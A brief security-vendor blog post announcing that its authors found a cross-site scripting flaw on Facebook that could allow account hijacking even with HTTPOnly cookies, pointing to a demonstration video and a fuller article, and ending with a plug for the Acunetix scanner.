Discovered XSS on Facebook can lead to account hijack
Discovered XSS on Facebook can lead to account hijack
Facebook rates as the second most popular website on the internet with 400 million active users. When such a website has common web application security flaws, they are going to be abused for one’s gain. When we came across an obvious cross-site scripting vulnerability, we decided to show that an attacker could do that.
The below video shows how an attacker may exploit a cross-site scripting vulnerability on Facebook.com regardless of the HTTPOnly cookie protection used. Of course, this goes way beyond showing an “alert()” popup in Javascript, since the attacker is also able to hijack the victim’s Facebook account. We also published an article to explain in more technical detail the works behind abusing this Cross-Site scripting vulnerability on Facebook.
Alliance Technology Partners is an Acunetix partner specializing in IT Security including Web Application Security
Acunetix Web Vulnerability Scanner home page